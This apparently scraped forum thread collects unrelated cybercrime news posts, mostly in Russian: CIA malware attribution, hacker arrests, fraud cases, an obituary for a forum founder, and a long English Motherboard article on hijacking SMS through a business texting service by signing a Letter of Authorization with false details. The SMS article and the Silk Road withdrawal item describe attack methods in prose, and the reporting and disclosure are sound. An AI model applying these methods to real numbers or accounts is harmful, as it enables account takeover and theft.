Сообщается, что большинство целей находилось в Пекине, Гуандуне и Чжэцзяне, а основные усилия ЦРУ были сосредоточены на индустрии гражданской авиации Китая и других стран. Основной задачей данной кампании, по словам экспертов, был «долгосрочный и целенаправленный сбор разведданных» с целью отслеживания статусов международных рейсов в режиме реальном времени, сбора информации о пассажирах, грузах и так далее.
Исследователи пишут, что обнаружить атаки ЦРУ им удалось благодаря использованию такой малвари, как Fluxwire и Grasshopper.
*https://wikileaks.org/ciav7p1/cms/page_15729329.html
*https://wikileaks.org/ciav7p1/cms/page_17072174.html
*https://wikileaks.org/ciav7p1/cms/page_12353652.html
*https://wikileaks.org/ciav7p1/cms/files/Fluxwire_manual-3.5.0.pdf
Напомню, что о существовании этих разновидностей вредоносного ПО стало известно в начале 2017 года, когда Wikileaks опубликовал дамп Vault 7: огромный архив документации, подробно рассказывающий о различных инструментах и техниках ЦРУ. Тогда, спустя несколько недель после публикации данных Vault 7, компания Symantec подтвердила, что Fluxwire — это малварь, которую они отслеживали долгие годы под именем Corentry. Теперь китайские исследователи, по сути, повторяют в своем отчете выводы Symantec, а также отмечают, что обнаружили образчики Fluxwire, задолго до того, как дамп Vault 7 стал общедоступным, а время их компиляции соответствует часовым поясам США.
В своем отчете Qihoo 360 обозначает хакерские операции ЦРУ кодовым названием APT-C-39. В отчетах, опубликованных другими ИБ-компаниями ранее, операции ЦРУ также отслеживались как Longhorn (обозначение Symantec) и Lamberts (обозначение «Лаборатории Касперского»).
Многие эксперты отмечают, что в отчете Qihoo 360 фактически нет ничего нового, большая часть информации уже была достоянием общественности, а исследователи лишь собрали и подтвердили данные из разных источников. Единственная действительно новая информация — это данные о конкретных целях, которые предположительно были взломаны ЦРУ в Китае.
• Source: hxxp://blogs.360.cn/post/APT-C-39_CIA_EN.html
Представили кази ещё летом прошлого года приобрели рекламную интеграцию у блогера за 1.3 миллиона рублей и вот спустя 6 месяцев с момента оплаты, рекламу они так и не увидели.
Финал у истории класека— блогер почистил всю переписку с менеджером и дропнул его в блэк.Click to expand...
Click to expand...
Хотим поделиться нашим опытом сотрудничества с достаточно популярным блогером и предостеречь тех, кто ещё не успел попасть в похожие ситуации с Edward Bil.
Началось наше первое сотрудничество с начала 2023. Первые пару интеграций прошли успешно. Мы слышали от общих знакомых, что Edward Bil, получая деньги, тут же тратит их еще до оказания услуг. Поэтому интеграции брали по одной, несмотря на его уговоры взять сразу пакет на 5 шт.
И вроде бы все было хорошо и ничего не предвещало беды. В очередной, а именно в третий раз мы обратились к главному персонажу с предложением об ещё одной интеграции. Договорились о стоимости и уточнили срок, на что получили ответ – полторы недели. 10 июля 2023 года отправили полную предоплату и получили подтверждение, что деньги дошли.

По истечению 2 недель деликатно уточняем, все ли в порядке и держимся ли в сроках. И как итог, получаем первую весточку грядущих проблем. Хорошо, предположим – форс-мажор. Ждем дальше.
Проходит ещё полторы недели. Снова тактично уточняем, что с интеграцией, за которую заплатили почти месяц назад. Ответ с элементами научной фантастики. И … барабанная дробь, в нашем сюжете появляется новый персонаж – Ми3улина. Edward Bil перенес ответственность на нее – как будто он договаривается с «людьми» на получение одобрения публикации ролика с упоминанием iGaming продукта. Все начинает выглядеть достаточно странно.Начиная понимать, что нас обманывают, уточняем возможность возвращения средств. Тут же оказывается, что согласие на интеграцию от «людей Ми3улиной» получено и скоро все будет, а точнее «в этом месяце» (спустя 1,5 месяца после внесения 100% предоплаты).


За 2 месяца переписки все очень динамично меняется: то разрешают ему работать «внешние силы», то не разрешают, то возвращает предоплату, то не возвращает. Очередной срок написан им же самим – 15 октября (это уже 3 месяца с момента 100% предоплаты!!!!!!!!!!!).Шёл 3 месяц с момента внесения 100% предоплаты за интеграцию. В надежде, что все-таки Edward Bil одумался, даже сами придумали ему инфоповод и идеи интеграции с новогодним розыгрышем. Получили от него ответ по типу «все будет» и стали ждать новогоднего чуда.
Но оно не произошло. К сожалению, спустя 6 месяцев с момента оплаты, ютуб интеграцию мы так и не получили: ни обещанной услуги, ни возврата денег. А рассказы про опасения рекламировать азартные игры оказались сказками – 26 декабря вышел очередной ролик на ютуб канале нашего главного героя и в нем … барабанная дробь – реклама 1хbet. Наведите камеру на QR, и вы перейдете по реферальной ссылке нашего героя на сайт 1xbet.
Ну и в завершение истории хочется отметить, что мы не оставляли надежд на адекватное решение вопроса. В начале января 2024 мы предложили Edward Bil аналоговый вариант интеграции – вместо роликов в YouTube мы предложили сделать несколько публикаций в его основном ТГ канале.
На наше удивление блогер отреагировал положительно и даже вступил в диалог, начав отвечать. Однако, к сожалению, даже такой вариант завершения оплаченной сделки не был реализован. Каждый раз когда мы предоставляли контент для публикации – находились все новые и новые причины не публиковать посты.
Вся эпопея закончилась тем, что 28.01.2024 Edward Bil почистил всю переписку с нами, хотя 100% предоплату получил 10.07.2023. Больше наш герой на контакт не выходил. В общем, не ожидали мы такого непрофессионализма от блогера-миллионника.
Click to expand...
На
48 году жизни из-за онкологии скончался основатель и главный администратор
Antichat
🕯Нам тяжело сообщать плохие новости, но мы с глубоким сожалением подтверждаем, что главный администратор, основатель и идейный вдохновитель нашего форума Егорыч+++ скоропостижно скончался на 48 году жизни. Последние полтора года он боролся с онкологическим заболеванием, о чём никто, кроме его семьи не знал и даже не догадывался.
Для
всех нас это стало внезапным ударом и ужасной потерей. Для многих из нас он
был близким другом, лидером и человеком с несгибаемой силой воли и неутомимой
жаждой к жизни. Именно благодаря ему выросло не одно поколение специалистов в
области информационной безопасности, да и зародилось само направление ИБ в
России как таковое. От этого особо печально признавать потерю одного из людей,
стоящих у истоков российской хак-сцены как искусства и, может быть, даже
смысла жизни для тысячи юных умов, среди которых когда-то были и вы, и я.
Для обеспечения функционирования форума и поддержания его в актуальном
состоянии мы развернем полную копию ресурса на отдельном сервере, но доступную
по новому домену.
Судьба
главного домена пока остаётся не ясна. Мы ожидаем атаку кибер-сквоттеров по
окончанию регистрации имеющихся имён. На данный момент начата процедура
наследования прав семье Егорыча+++ на торговую марку Античат как в России, так
и в Европе. Это означает, что возможно нас ждут суды, либо мы успеем их
избежать, если договоримся с регистраторами. Однако, мы уже начали процесс
восстановления доступа к доменам на основании имеющихся документов.
С
нашей стороны мы постараемся сохранить Античат таким, каким вы его сейчас
видите с минимальными изменениями в будущем. Все права на форум и проект
останутся семье Егорыча+++, ни о какой продаже, перемещение прав или смене
владельца форума речи не идет. Вся команда администраторов и модераторов
преимущественно останется в старом составе.
Дорогие друзья! Нам тяжело сообщать плохие новости, но мы с глубоким сожалением подтверждаем, что главный администратор, основатель и идейный...
forum.antichat.com
Речь идет об участнике группировки Lapsus$
Полиция Лондона задержала 17-летнего хакера, относящегося к группе Lapsus$, которая может быть причастна к утечке GTA 6. Его нашли в графстве Оксфордшир в этот четверг.
Ранее группа Lapsus$ взломала серверы Uber и опубликовала данные таксистов в открытом доступе. До этого она украла 10 миллионов фунтов стерлингов, взломав сервисы Microsoft и Samsung. Тогда 17-летнего хакера тоже задержали, но опустили под залог.
18 сентября в сеть слили огромное количество контента по GTA 6. В роликах раннего билда можно рассмотреть двух главных героев, персонажей, анимации, некоторые механики, локации и карту. Издатель Take-Two до сих пор пытается удалить все видео с различных источников, но их постоянно перезаливают.
Позже Rockstar прокомментировала утечку. Компания отметила, что хакер нелегально получил доступ к серверам разработчиков, загрузив конфиденциальную информацию, включая ранние наработки экшена.
source: reuters.com/world/uk/uk-police-arrest-17-year-old-suspicion- hacking-2022-09-23
десять лет назад.
32-летний житель штата Джорджия (США) Джеймс Чжун (James Zhong) признал себя виновным перед судом Манхэттена «в мошенничестве с использованием средств связи со взломом» 50 676 BTC от даркнет-маркеплейса Silk Road еще в 2012 году.
Silk Road был первым крупным рынком даркнета, позволявшим торговцам продавать зачастую нелегальные товары в обмен на Биткойны. Чжун сумел обманом заставить платежную систему Silk Road передать ему биткойны через ряд фальшивых счетов.
В сентябре 2012 года Чжун реализовал мошенническую схему с использованием фейковых аккаунтов, не выставляя и не покупая на площадке какие-либо товары или услуги. По данным властей, он вносил депозиты в размере от 200 до 2000 BTC, после чего осуществлял быстрое снятие средств.
«Например, 19 сентября 2012 года Чжун перевел 500 BTC на кошелек Silk Road. Менее чем через пять секунд после внесения депозита он выполнил пять выводов по 500 BTC подряд, в результате чего чистая прибыль составила 2000 BTC», — говорится в сообщении.
Click to expand...
Согласно Минюсту, всего Чжун инициировал более 140 подобных транзакций. Схема принесла ему более 50 000 BTC. После хардфорка в сети первой криптовалюты на адрес мужчины начислили аналогичную сумму в Bitcoin Cash, которую он потом обменял на Биткойны.
Первоначально власти изъяли Биткойны, а также слитки драгоценных металлов и более 600 000 долларов наличными в доме Чжуна во время рейда 9 ноября прошлого года. Они нашли б о льшую часть Биткойнов с помощью обнаружения приватных ключей в подземном сейфе и «на одноплатном компьютере, который был погружен под одеяло в жестянку из-под попкорна, хранящуюся в туалете».
Житель штата Джорджия признал вину в мошенничестве с использованием
электронных средств. Максимальное наказание по этой статье — 20 лет лишения
свободы.
Суд издал предварительное постановление о согласии на конфискацию имущества
Чжуна. Окончательный приговор озвучат 22 февраля 2023 года.
source: justice[.]gov/usao-sdny/pr/us-attorney-announces-historic-336-billion- cryptocurrency-seizure-and-conviction
Парижская полиция арестовала гражданина России по обвинению в причастности к группе хакеров-вымогателей Hive. У него было обнаружено более 570 000 евро в различных криптовалютах.
Hive шифрует данные зараженных компьютеров, а хакеры вымогают средства в криптовалютах за расшифровку данных. Жертвами вируса-вымогателя во Франции стали более 60 компаний и частных лиц, в том числе Altice, Damart и некоторые муниципальные ведомства.
Арестованному россиянину, по данным радио RMC.BFMTV, около 40 лет, а сам он проживает на Кипре. Он был арестован по прибытию в Париж. В кипрском доме обвиняемого провели обыски и изъяли значительную сумму денег в различных криптовалютах.
Сотрудники французской финансовой разведки смогли отследить потоки криптовалют от пострадавших компаний до кошельков подозреваемого. Затем им удалось идентифицировать участника хакерской группировки Hive и найти его во время пребывания в Париже.
При этом российскому посольству об аресте подозреваемого россиянина не сообщалось ― сотрудники посольства узнали об этом из материалов СМИ.
Напомним, в январе сотрудники ФБР совместно с правоохранительными органами Германии и Нидерландов ликвидировали инфраструктуру шифровальщика Hive и получили контроль над всеми Tor-сайтами группировки.
Согласно подсчетам ведомства, хакеры взломали свыше 1500 компаний в 80 странах и путем шантажа получили от пострадавших около $100 млн.
• Source: [https://www.lefigaro.fr/internation...rancongiciel-hive-interpelle- a-paris-20231212](https://www.lefigaro.fr/international/un-banquier-occulte- russe-du-reseau-de-rancongiciel-hive-interpelle-a-paris-20231212)
Джозеф Гаррисон заработал не менее 2.1 миллиона долларов.
18-летний Джозеф Гаррисон из Мэдисона (штат Висконсин) обвиняется в том, что он организовал взлом сайта ставок на спорт DraftKings и похитил 600 тысяч долларов с сотен аккаунтов клиентов.
По данным федеральных прокуроров в Манхэттене, Гаррисон использовал украденные логины и пароли, которые он купил в даркнете, чтобы взломать 60 тысяч аккаунтов на DraftKings в ноябре прошлого года. Затем он продал эту информацию другим людям, которые использовали ее для опустошения 1600 аккаунтов клиентов. Этот метод взлома называется "credential stuffing" и работает лучше всего, когда пользователи используют одинаковый пароль и логин на разных сайтах.
"Мошенничество - это весело", - якобы написал Гаррисон в текстовом сообщении своему соучастнику, согласно документам суда. "Я зависим от того, чтобы видеть деньги на своем счету".
Компания DraftKings не названа в уголовном иске, но подтвердила, что некоторые аккаунты ее клиентов были скомпрометированы в ходе схемы и заявила, что вернула похищенные деньги.
"Безопасность и конфиденциальность личной и платежной информации наших клиентов имеют первостепенное значение для DraftKings", - говорится в заявлении компании.
Во время взлома Гаррисон уже сталкивался с обвинениями в отдельном деле в Висконсине за то, что якобы платил людям в биткоинах онлайн за то, чтобы они звонили с угрозами бомбы в его собственную школу в Мэдисоне и в других городах, где жили его друзья. Эта практика называется "swatting". В одном из таких случаев Гаррисон якобы попросил позвонить с угрозой потому, что ему было скучно и он хотел уйти домой, согласно судебным записям в Висконсине.
Гаррисон сдался властям Нью-Йорка в четверг утром и должен был предстать перед судьей позже в тот же день. Сразу не было ясно, нанял ли он адвоката по делу о хакинге, а адвокат, который представлял его по ранее делу о "swatting", не ответил на сообщение с просьбой прокомментировать арест.
Пока полиция Висконсина расследовала дело о "swatting", она обнаружила доказательства того, что Гаррисон был замешан в ряд хакерских афер на протяжении нескольких лет и накопил состояние в 2.1 миллиона долларов к 17 годам. Он признался, что зарабатывал в среднем 15 тысяч долларов в день с 2018 по 2021 годы, но сказал следователям, что перестал заниматься какой-либо хакерской деятельностью, говорится в документах суда.
Но через пять месяцев после этого он якобы совершил атаку "credential stuffing" на сайте DraftKings, заявили прокуроры. Сотрудники DraftKings смогли выйти на след Гаррисона после того, как запустили свое собственное расследование и выкупили некоторые из похищенных им учетных данных, которые он продавал в темной сети.
"Гаррисон получил несанкционированный доступ к аккаунтам жертв, используя сложную кибератаку для кражи сотен тысяч долларов", - заявил Майкл Дрисколл из ФБР. "Кибервторжения, направленные на кражу личных средств частных лиц, представляют серьезную угрозу для нашей экономической безопасности".
Следствие позже установило, что IP-адрес злоумышленника, который использовался для продажи информации об аккаунтах, соответствовал IP-адресу дома родителей Гаррисона, где он жил.
Это не первый случай взлома сайта ставок на спорт. Ранее мы писали о том, как хакеры похитили данные более 2 миллионов пользователей сайта BetUS . Также мы сообщали о том, как хакеры вымогали 10 миллионов долларов от компании SBTech , которая предоставляет программное обеспечение для сайтов ставок на спорт.
Мошенница обманула отставного армейского генерала Джерардино де Мео. 71-летний генерал занимал должность должностного лица в течение многих лет, и в своей карьере он долгое время работал на должности командира материально- технического отряда НАТО в Вероне. Несмотря на свою отмеченную наградами карьеру, генерал в отставке стал жертвой онлайн-мошенницы.
"Я всю жизнь имел дело с интеллектом и контрразведкой , - объяснил де Мео,
История, которая кажется невероятной, но, к сожалению, действительно произошла. "Я остался дома один, обычно меня окружают люди, и в ту ночь моя жена отправилась навестить мою дочь в Болонью. Я был в нашем доме в Вероне, и получил эти три, казалось бы, невинных лайка от китайского предпринимателя. Женщина заставила меня поверить, что мы встретились в Германии, и я не подозревал, что это может быть мошенничество против меня. Мы продолжали разговаривать, пока не подружились на расстоянии".
Оттуда самозваный предприниматель предложил бывшему генералу инвестировать небольшую сумму денег в биткойн. «Всего тысяча евро», и однажды де Мео решил принять предложение. "Это было начало конца. Я отправил деньги в виде криптовалюты на платформу, которая должна была увеличить их с некоторыми приветственными бонусами. Сразу после этого я получил проценты. Казалось, все шло хорошо, и после первых инвестиций мой "друг" предложил мне больше".
Один за другим де Мео потерял более 200 тысяч евро. Он был шокирован, а затем нашел поддержку у членов своей семьи. "Я получил большую поддержку, и вместе с ними мне понравилась внимание ассоциации Acta (Действие против аффективных мошенников и борьба с киберпреступностью). Никто не застрахован от таких опасностей, и любой может вляпаться в это".
33-летний Миломир с двойным гражданством заработал около $18 млн. на продаже наркотиков в тёмной сети.
Миломир Десница, 33-летний гражданин Хорватии и Сербии, обвиняется в запуске и управлении даркнет-маркета Monopoly Market. С помощью платформы Десница содействовал продаже различных наркотиков и лекарственных препаратов. По данным министерства юстиции, на продаже щапрещенных веществ преступник заработал около $18 млн.
Согласно обвинительному заключению , Десницу разыскивают правоохранительные органы с июля 2022 года, и недавно он был экстрадирован из Австрии для предъявления обвинений в Вашингтоне. Ему предъявлены обвинения в отмывании денег, а также во владении и распространении запрещённых веществ.
Десница якобы использовал по крайней мере две службы обмена криптовалют для отмывания своих незаконных доходов. Затем он продавал криптовалюту сербским трейдерам из рук в руки в обмен на фиатную валюту, чтобы отмыть свои заработки. Если вина Десницы будет доказана, ему может грозить максимальное наказание – пожизненное заключение и финансовые штрафы.
Ранее в мае в ходе международной операции правоохранительных органов под кодовым названием «SpecTor» были арестованы 288 продавцов и клиентов даркнета по всему миру, а полиция конфисковала €50,8 млн. наличными и криптовалютой.
Арестованные продавцы работали на даркнет-рынке «Monopoly Market», на котором продавались наркотики и огнестрельное оружие. Monopoly Market был запущен в 2019 году, но позже был захвачен властями Германии в 2021 году и использовался для сбора доказательств о продавцах и покупателях.
По данным Европола, продавцы Monopoly Market также работали на других даркнет- маркетах, поэтому их арест в значительной степени повлиял на торговлю наркотиками и незаконными товарами в даркнете. В рамках операции «SpecTor» правоохранительные органы также конфисковали 850 кг наркотиков и 117 единиц огнестрельного оружия.
source: justice[.]gov/usao-dc/pr/citizen-croatia-and-serbia-charged-running- monopoly-drug-market-darknet

A gaping flaw in SMS lets hackers take over phone numbers in minutes by
simply paying a company to reroute text messages.
I didn't expect it to be that quick. While I was on a Google Hangouts call
with a colleague, the hacker sent me screenshots of my Bumble and Postmates
accounts, which he had broken into. Then he showed he had received texts that
were meant for me that he had intercepted. Later he took over my WhatsApp
account, too, and texted a friend pretending to be me.
Looking down at my phone, there was no sign it had been hacked. I still had
reception; the phone said I was still connected to the T-Mobile network.
Nothing was unusual there. But the hacker had swiftly, stealthily, and largely
effortlessly redirected my text messages to themselves. And all for just $16.
I hadn't been SIM swapped, where hackers trick or bribe telecom employees to
port a target's phone number to their own SIM card. Instead, the hacker used a
service by a company called Sakari, which helps businesses do SMS marketing
and mass messaging, to reroute my messages to him. This overlooked attack
vector shows not only how unregulated commercial SMS tools are but also how
there are gaping holes in our telecommunications infrastructure, with a hacker
sometimes just having to pinky swear they have the consent of the target.
"Welcome to create an account if you want to mess with it, literally anyone
can sign up," Lucky225, the pseudonymous hacker who carried out the attack,
told Motherboard, describing how easy it is to gain access to the tools
necessary to seize phone numbers.
Fortunately, [Lucky225 was taking over my
number](https://lucky225.medium.com/its-time-to-stop-using-sms-for-
anything-203c41361c80) and breaking into the connected accounts with my
permission to demonstrate the flaw. This also doesn't rely on SS7
exploitation, where more sophisticated attackers tap into the telecom
industry's backbone to intercept messages on the fly. What Lucky225 did with
Sakari is easier to pull off and requires less technical skill or knowledge.
Unlike SIM jacking, where a victim loses cell service entirely, my phone
seemed normal. Except I never received the messages intended for me, but he
did.
Once the hacker is able to reroute a target's text messages, it can then be
trivial to hack into other accounts associated with that phone number. In this
case, the hacker sent login requests to Bumble, WhatsApp, and Postmates, and
easily accessed the accounts.
"I used a prepaid card to buy their $16 per month plan and then after that was
done it let me steal numbers just by filling out LOA info with fake info,"
Lucky225 added, referring to a Letter of Authorization, a document saying that
the signer has authority to switch telephone numbers. (Cyber security company
Okey Systems, where Lucky225 is Director of Information, has released a tool
that companies and consumers can use to detect this
attack and other types of phone number takeovers).
The method of attack, which has not been previously reported or demonstrated
in detail, has implications for cybercrime, where criminals often take over
target's phone numbers in order to harass them, drain their bank account, or
otherwise tear through their digital lives. The attack also brings up issues
around private, corporate, and national security, where once a hacker gains a
foothold on a victim's phone number, they may be able to intercept sensitive
information or personal secrets.
"It’s not hard to see the enormous threat to safety and security this kind of
attack poses. The FCC must use its authority to force phone companies to
secure their networks from hackers. Former Chairman Pai’s approach of industry
self-regulation clearly failed," Senator Ron Wyden said in a statement after
Motherboard explained the contours of the attack.
"Sakari is a business text messaging service that allows businesses to send
SMS reminders, alerts, confirmations and marketing campaigns," the company's
website reads.
For businesses, sending text messages to hundreds, thousands, or perhaps
millions of customers can be a laborious task. Sakari streamlines that process
by letting business customers import their own number. A wide ecosystem of
these companies exist, each advertising their own
ability to run text messaging for other businesses. Some firms say they only
allow customers to reroute messages for business landlines or VoIP phones,
while others allow mobile numbers too.
Sakari offers a free trial to anyone wishing to see what the company's
dashboard looks like. The cheapest plan, which allows customers to add a phone
number they want to send and receive texts as, is where the $16 goes. Lucky225
provided Motherboard with screenshots of Sakari's interface, which show a red
"+" symbol where users can add a number.
While adding a number, Sakari provides the Letter of Authorization for the
user to sign. Sakari's LOA says that the user should not conduct any unlawful,
harassing, or inappropriate behaviour with the text messaging service and
phone number.
But as Lucky225 showed, a user can just sign up with someone else's number and
receive their text messages instead.
Do you work for telecom or one of the other companies mentioned? Do you know anything else about this attack? We 'd love to hear from you. Using a non-work phone or computer, you can contact Joseph Cox securely on Signal on +44 20 8133 5190, Wickr on josephcox, OTR chat on jfcox@jabber.ccc.de, or email joseph.cox@vice.com.
Click to expand...
A few minutes after they entered my T-Mobile number into Sakari, Lucky225
started receiving text messages that were meant for me. I received no call or
text notification from Sakari asking to confirm that my number would be used
by their service. I simply stopped getting texts.
"Hello. This is Lorenzo," my colleague Lorenzo Franceschi-Bicchierai wrote to
the number.
"Hi Lorenzo
- Lucky," the hacker replied.
"As of today, you don't know this happens," [Teli
Tuketu](https://www.vice.com/en/article/53937n/suchcalls-brings-encrypted-
phreak-fun-to-smartphone-calling), the CEO of Okey Systems, told Motherboard
in a phone call, referring to how there is no way for the target to
immediately know their text messages have been rerouted. "You don't know these
attacks happen."
Motherboard also created an account for verification purposes, but Sakari
suspended the account after contacted for comment.
It is not clear how much this method of attack is being used in the wild on
mobile numbers. Karsten Nohl, a researcher from Security Research Labs who has
investigated telecommunications security for years, said he had not seen it
before. Tuketu said it "absolutely" is happening.
Ted Blatt, vice president of sales at Text My Main Number, a similar company
to Sakari, told Motherboard in an email that "we just recently suspected
suspicious activity on one of our accounts and immediately shut it down and
reported this activity on our end."
Motherboard created Bumble, Postmates, and WhatsApp accounts in part because
of their reliance on SMS as either a signup or login method for user accounts,
rather than, say, an email address and password (this is the case for many
apps).
Eva Galperin, director of cybersecurity at activist organization the
Electronic Frontier Foundation said that the demonstrated attack "underscores
the importance of moving people off of SMS 2FA and, more broadly, off of
'login with your phone number' solutions."
Neither Bumble nor Postmates responded to a request for comment. WhatsApp does
have mitigations in place such as sending users a notification when they are
logged out of their device by accessing their account from another. A WhatsApp
spokesperson told Motherboard in a statement that “With so many apps relying
on SMS codes, it's critical that mobile carriers do more to protect their
customers privacy and security. To stay ahead of this problem, WhatsApp has
built features that notifies users and their chats when someone registers a
new device. In addition, we strongly encourage turning on two factor
verification, which protects accounts with a special user-created pin that
helps prevent others from using your WhatsApp number."
AT&T, T-Mobile, and Verizon acknowledged requests for comment, but then
directed Motherboard to CTIA, a trade association representing the wireless
industry. CTIA said in a statement that "After being made aware of this
potential threat, we worked immediately to investigate it, and took
precautionary measures. Since that time, no carrier has been able to replicate
it. We have no indication of any malicious activity involving the potential
threat or that any customers were impacted. Consumer privacy and safety is our
top priority, and we will continue to investigate this matter."
The "carrier doesn't matter," Lucky225 said, regarding which carriers the
attack can work on. "It's basically the wild west."
As for how Sakari has this capability to transfer phone numbers, Nohl from
Security Research Labs said "there is no standardized global protocol for
forwarding text messages to third parties, so these attacks would rely on
individual agreements with telcos or SMS hubs."
In Sakari's case, it receives the capability to control the rerouting of text
messages from another firm called Bandwidth, according to a copy of Sakari's
LOA obtained by Motherboard. Bandwidth told Motherboard that it helps manage
number assignment and traffic routing through its relationship with another
company called NetNumber. NetNumber owns and operates the proprietary,
centralized database that the industry uses for text message routing, the
Override Service Registry (OSR), Bandwidth said.
When asked for comment, NetNumber also pointed Motherboard to the CTIA
statement.
The flow of the capability to reroute text messages is similar in some ways to
the cell phone location data market, where telecommunications giants such as
T-Mobile, AT&T, and Sprint sold access to their customers location data to a
series of aggregators, who then in turn resold that access to other companies.
And along with that transfer of the location data access, each company also
pushed the need to obtain consent down to the company below it, resulting in
wide room for abuse. In 2019, [Motherboard reported on how we paid a bounty
hunter source](https://www.vice.com/en/article/nepxbz/i-gave-a-bounty-
hunter-300-dollars-located-phone-microbilt-zumigo-tmobile) $300 to gain the
location of a phone to demonstrate the issue, with the target phone not
receiving any sort of text message or voice call to confirm they had provided
consent to be tracked. Verizon introduced its own consent mechanism where it
forced at the carrier level a targeted phone to receive a text message to
confirm the owner consented to sharing their location data.
That practice of delegating the need to obtain consent to other companies also
applies to this latest issue of text messaging routing. In this case, Sakari
asked Lucky225 to sign an LOA to confirm they had the authority to take
control of Motherboard's phone number, but at the time Sakari did not send any
sort of message to the target number to confirm whether the user consented to
the transfer. Bandwidth said it was the responsibility of the retail service
provider, which in this case was Sakari, to obtain the consent.
"While text message forwarding might have legitimate applications for
businesses, the particular implementation underpinning this attack is
appallingly weak in security and data privacy. Telcos have different ways of
authenticating their customers, obviously including text messaging. The fact
that none of these authentication methods are used in this case to get consent
from the owner of a forwarded phone number is shocking," Nohl added.
Adam Horsman, co-founder of Sakari, told Motherboard in an email "Sakari takes
privacy and security extremely seriously, and we already go above and beyond
industry standards. Our success depends on us being a trusted platform with
zero tolerance for fraud or spam," and added that on top of the LOA, Sakari
has "a robust process for verification on top of this, including validating
each client’s business email address, manual review by a team member whenever
an account requests an upgrade to a paid plan, and confirming a genuine
payment method."
"We have not seen any previous instances of intentional abuse of text-
enablement, and your researcher played the role of a bad actor within a
genuine company, which is an unusual vector of attack. But we appreciate you
bringing this to our attention, and have updated our hosted messaging process
to catch this in the future," he continued. Malicious insiders or customers
are a common, established means of attack, whether that is rogue employees or
clients abusing the access they've been granted.
Horsman added that, effective immediately, Sakari has added a security feature
where a number will receive an automated call that requires the user to send a
security code back to the company, to confirm they do have consent to transfer
that number. As part of another test, Lucky225 did try to reroute texts for
the same number with consent using a different service called Beetexting; the
site already required a similar automated phone call to confirm the user's
consent. This was in part "to avoid fraud," the automated verification call
said when Motherboard received the call. Beetexting did not respond to a
request for comment.
Horsman said Sakari will also audit all existing text-enabled numbers "across
all Sakari accounts to make sure there are no other instances."
"SMS is a hugely powerful communication medium, and as it continues to
dominate the communication landscape, we agree there are improvements needed
by the industry—both carriers and resellers—to improve security and trust.
Unlike voice, porting messaging privileges is not as regulated and as a result
is not standardized for industry participants. For example, it often does not
include a final step of the losing carrier review and verification before a
port is made. Industry experience has demonstrated that regulation from the
FCC on messaging porting would greatly improve the security and effectiveness
of the ecosystem," Horsman added.
In a statement, FCC Acting Chairwoman Jessica Rosenworcel said "If true, these
reports about newly discovered smartphone vulnerabilities are alarming.
Consumers rely on their smartphones for more activities and sensitive data
than ever before. We need to better understand this potential vulnerability
and make sure we are taking the right steps to protect and educate consumers."
Senator Mark Warner told Motherboard in a statement that "While policymakers
have paid considerable attention to the ways in which social media platforms
have been exploited by bad actors, relatively little attention has been paid
to the ways in which bad actors readily exploit vulnerabilities and broken
processes in the wireless sector to further fraud, facilitate cyber-crime, and
engage in harassment and abuse. We see over and over again that technologies
are not being evaluated for their susceptibility to abuse and exploitation by
bad actors. This new report raises serious concerns about the degree to which
the wireless industry has prioritized this vector for fraud, abuse, and cyber-
crime."
Okey Systems' monitoring tool works by creating a
fingerprint of a user's phone number, including the carrier it is connected to
and its SMS routes, Tuketu, the company's CEO, said. The company has also
sought access to telecoms’ SIM databases, meaning they could monitor for
changes there too.
With these observation points, when something changes, either by a hijack like
in this attack or a SIM swap, Okey Systems should be able to detect and warn
the user by a text message sent to another number or their email address.
Tuketu said the company is also adding support for notifications via Telegram,
Keybase, and Signal.
"We didn't want to disclose it until we had some solutions to address it,"
Tuketu said. "We did not want to charge for them, because that just doesn't
seem right." The consumer version of Okey Monitoring is free to use, and the
company plans to make money in other ways like corporate partnerships, he
said.
But Sakari is only one company. And there are plenty of others available in
this overlooked industry.
Tuketu said that after one provider cut-off their access, "it took us two
minutes to find another."
_Lorenzo Franceschi-Bicchierai contributed reporting to this article.
Update: This piece has been updated to include a response from NetNumber.
Originally, Tuketu said Okey Systems has gained access to AT&T’s SIM database.
Tuketu misspoke; instead the company has sought access to such databases. _
Как утверждает Минюст, американцы "в сговоре с российскими гражданами" взломали электронную диспетчерскую систему службы такси в аэропорту имени Джона Кеннеди.
Американский Минюст предъявил двум гражданам Соединенных Штатов обвинения в содействии "российским хакерам" при взломе диспетчерской службы такси международного аэропорта имени Джона Кеннеди в Нью-Йорке.
В сообщении ведомства указывается, что «в течение многих лет хакерские атаки обвиняемых не позволяли честным водителям такси оплачивать проезд в аэропорту Кеннеди в том порядке, в котором они прибыли. Благодаря совместной работе Минюста и администрации аэропорта, этим обвиняемым предъявлены серьезные уголовные обвинения за их предполагаемые киберпреступления».
По утверждению прокуратуры, 48-летние жители Нью-Йорка Дэниель Абаев и Питер Лейман «в сговоре с российскими гражданами» взломали электронную диспетчерскую систему службы такси в аэропорту имени Джона Кеннеди. Это якобы позволило им вывести определенные такси в начало очереди в обмен на плату.
Как уточнили в Минюсте, кибератаки были совершены в период с 2019 по 2020 год. Полиция арестовала обвиняемых в Квинсе. Теперь двум мужчинам, в случае признания их виновными, грозит до 10 лет тюремного заключения.
source: justice[.]gov/usao-sdny/pr/two-men-arrested-conspiring-russian- nationals-hack-taxi-dispatch-system-jfk-airport
Национальная судебная коллегия Испании приговорила к четырем годам и шести месяцам лишения свободы российского хакера Дениса Токаренко. Об этом говорится в распространенном в пятницу решении юридической инстанции.
По ее утверждению, осужденный «создал вредоносную программу, с помощью которой он из своего дома в Аликанте заразил компьютеры банковских учреждений в разных странах мира, что позволило ему удаленно управлять банкоматами, чтобы извлекать деньги и таким образом получить почти €5 млн».
В суде уточнили, что Денис Токаренко получил три года тюрьмы за компьютерное мошенничество, еще по полгода за участие в деятельности преступной группировки, фальсификацию официальных документов и отмывание средств. Кроме того, осужденный оштрафован на €6 млн. Его девушка, гражданка Украины Юлия Глушенкова получила полгода тюрьмы и €300 тыс. штрафа за отмывание денег.
Как пояснили в судебной коллегии, разбирательство началось после уведомления от бельгийских властей о существовании преступной организации, которая занималась мошенничеством в разных странах. Следователи установили, что члены группировки направляли электронные письма сотрудникам банков, выдавая себя за компании, с которыми работали учреждения. После того, как сотрудник банка открывал письмо, вредоносная программа заражала компьютерную систему банка, что позволяло мошенникам «управлять банковскими счетами и банкоматами удаленно».
В суде добавили, что Токаренко смог заразить программой банк Тайваня в 2016 году. Члены группировки сняли наличные в банкоматах учреждения на сумму более $2,6 млн. Однако правоохранительным органам Тайваня удалось арестовать двух человек и вернуть почти все средства. По версии следствия, Токаренко также причастен к аналогичным махинациям в отношении банков Азербайджана, Белоруссии, Казахстана и Румынии.
